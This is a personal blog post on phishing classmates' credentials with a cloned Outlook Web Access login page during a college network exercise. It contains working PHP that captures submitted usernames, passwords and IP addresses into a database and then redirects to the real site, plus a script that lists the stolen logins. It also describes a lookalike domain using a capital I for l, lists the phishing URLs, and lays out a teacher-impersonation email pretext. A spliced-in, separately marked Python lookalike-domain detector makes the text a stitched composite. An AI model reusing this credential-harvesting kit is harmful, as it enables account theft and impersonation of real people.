Phishing using a spoofed Outlook Web Access Page

Every year, there is an experiential learning class at the college I graduated from where students run a real-world scenario, setting up a fictitious company's IT department: servers, switches, routers, firewalls, etc.  The fun thing for the alumni is that we get to practice some of our network penetration skills.

A few years back, I was fortunate enough to have a group of students leave a few gaping holes open on their network, and I decided to teach them a valuable lesson about how a targeted attack is likely to happen: social engineering.

I used an authority figure (the teacher) to lure them to a website where I phished their credentials.  At the time it wasn't working as well as I had wanted, but I gave it a shot anyway.  I purchased a similar domain and sent an email from the "teacher" complaining about problems with OWA.  Sure enough, I had a bite.  It wasn't just a normal user; it was the domain administrator.  After that, it was game on.  At the time I didn't even capture usernames; the only thing I had was the password.

That brings us to today.  I decided to improve my phishing skills a bit, and we'll see how it goes.

First step was getting a mirror copy of the OWA web page.  For this, I used a freely available website download tool.

From there, I dove into the source code of the page.  The main thing that needed to be changed was the form action, so that it posts to a PHP file I created.

[Screenshot: OWA Phishing]

In the same directory as your spoofed OWA page, you need to create an insert1.php file.  Below is the source code I used (minus database information).  The nice thing about this is that the prepared statement prevents a SQL injection attack, in case the students wanted to get some backlash at me.  Notice at the bottom of the code that it redirects to the real OWA, a feature that was requested the last time I attempted this.

<?php
$mysqli = new mysqli("dbhostname", "dbuser", "dbpassword!", "dbname");

/* check connection */
if (mysqli_connect_errno()) {
    printf("Connect failed: %s\n", mysqli_connect_error());
    exit();
}

/* Prepare an insert statement */
$query = "INSERT INTO solar (Username, Password, IP) VALUES (?,?,?)";
$stmt = $mysqli->prepare($query);
$stmt->bind_param("sss", $val1, $val2, $val3);
$val1 = $_POST['username'];
$val2 = $_POST['password'];
$val3 = $_SERVER['REMOTE_ADDR'];

/* Execute the statement */
$stmt->execute();

/* close statement */
$stmt->close();

/* close connection */
$mysqli->close();

/* Redirect to the real OWA logon page */
header('Location: https://mail.solarsystems-it.com/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=https%3a%2f%2fmail.solarsystems-it.com%2fowa%2f');
?>

That is the majority of the setup.  I also added a PHP file to display the contents of this database.

<?php
$mysqli = new mysqli("dbhost", "dbuser", "dbpassword", "db");

/* check connection */
if (mysqli_connect_errno()) {
    printf("Connect failed: %s\n", mysqli_connect_error());
    exit();
}

/* retrieve all rows from the solar table */
$query = "SELECT ID, Username, Password, IP, Time FROM solar";
if ($result = $mysqli->query($query)) {
    while ($row = $result->fetch_row()) {
        printf("%s (%s, %s, %s, %s) \n", $row[0], $row[1], $row[2], $row[3], $row[4]);
    }
    /* free result set */
    $result->close();
}
?>

After this, you'll have to set up your MySQL database.  I set mine up with the columns ID (indexed record identifier, auto-incrementing), Username, Password, IP, and Time.  I believe the timestamp is created automatically by MySQL.

Now I'm at the fun part.  I've purchased the domain soiarsystems-it.com.  I'll change the case of the i to a capital I so it looks like an l, and I'll send a few emails to students pretending to be the teacher, complaining about certificate errors on the OWA website (there really are some, since the page is pulling SSL data from their website).
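From the defender's side, the capital-I-for-l swap described above is exactly the kind of lookalike a mail filter or triage script should flag. The following is an added example, not code from the original post: it folds visually confusable characters into a "skeleton" of the host name, then compares that skeleton and its edit distance against the legitimate domain. The confusable table is a small constructed subset, the sample mail text is constructed, and the legitimate domain is taken from the post.

```python
import re
from urllib.parse import urlparse

# Visually confusable substitutions (constructed subset; the Unicode
# confusables table is far larger). Multi-character entries are applied first.
CONFUSABLES = {"rn": "m", "vv": "w", "I": "l", "1": "l", "|": "l", "0": "o", "5": "s"}

def skeleton(label: str) -> str:
    """Fold a host name to what a reader 'sees': confusables mapped, then lowercased."""
    for src, dst in sorted(CONFUSABLES.items(), key=lambda kv: -len(kv[0])):
        label = label.replace(src, dst)
    return label.lower()

def registrable_domain(url: str) -> str:
    """Last two host labels with case preserved (assumes a one-label suffix such as .com).
    urlparse().hostname lowercases, which would hide the I-for-l swap, so netloc is used."""
    host = urlparse(url).netloc.rsplit("@", 1)[-1].split(":")[0]
    return ".".join(host.split(".")[-2:])

def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute), to catch one-letter typosquats like soiar/solar."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_url(url: str, legit_domain: str) -> str:
    """'legit' on exact match, 'lookalike' on equal skeleton or edit distance <= 2, else 'unrelated'."""
    dom = registrable_domain(url)
    if dom.lower() == legit_domain.lower():
        return "legit"
    if skeleton(dom) == skeleton(legit_domain):
        return "lookalike"
    if levenshtein(skeleton(dom), skeleton(legit_domain)) <= 2:
        return "lookalike"
    return "unrelated"

URL_RE = re.compile(r"https?://[^\s<>\"']+")

def scan_message(body: str, legit_domain: str) -> list:
    """Return (url, verdict) for every URL in a mail body, for a filter or SOC triage script."""
    return [(u, classify_url(u, legit_domain)) for u in URL_RE.findall(body)]

# Constructed sample mail modelled on the pretext in the post.
SAMPLE_MAIL = """Hi all, OWA is throwing certificate errors again, can you check
http://mail.soIarsystems-it.com/owa/auth/logon796b.html and confirm?
The normal link is https://mail.solarsystems-it.com/owa/ and the syllabus is at https://www.example.edu/"""

if __name__ == "__main__":
    for url, verdict in scan_message(SAMPLE_MAIL, "solarsystems-it.com"):
        print(f"{verdict:10} {url}")
```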

The main reason for this post is that I'll include a link to it in the page source so the students can know they've been had (assuming they view the page source).  I'll use my custom URL shortener so I can track who clicks it.

So far, they don't have anything wide open port-wise, which is good.  The idea is that if I get usernames and passwords, I'll see what I can do once I get hold of an email account on OWA.

Links to the pages:

http://mail.soIarsystems-it.com/owa/auth/logon796b.html

http://mail.soIarsystems-it.com/SolarSystems/owa/auth/display.php

Article written by

Tyler was born and raised in Waterloo, Iowa where he currently resides with his wife Amanda, a cat - Bam, and two sons - Elijah and Benjamin. He is employed as a network administrator with First Security State Bank and enjoys technology and computers. Amanda is a student in at the University of Northern Iowa and is studying to be a teacher. She is also active in the Iowa Army National Guard. She is a 92A, which is a supply specialist.
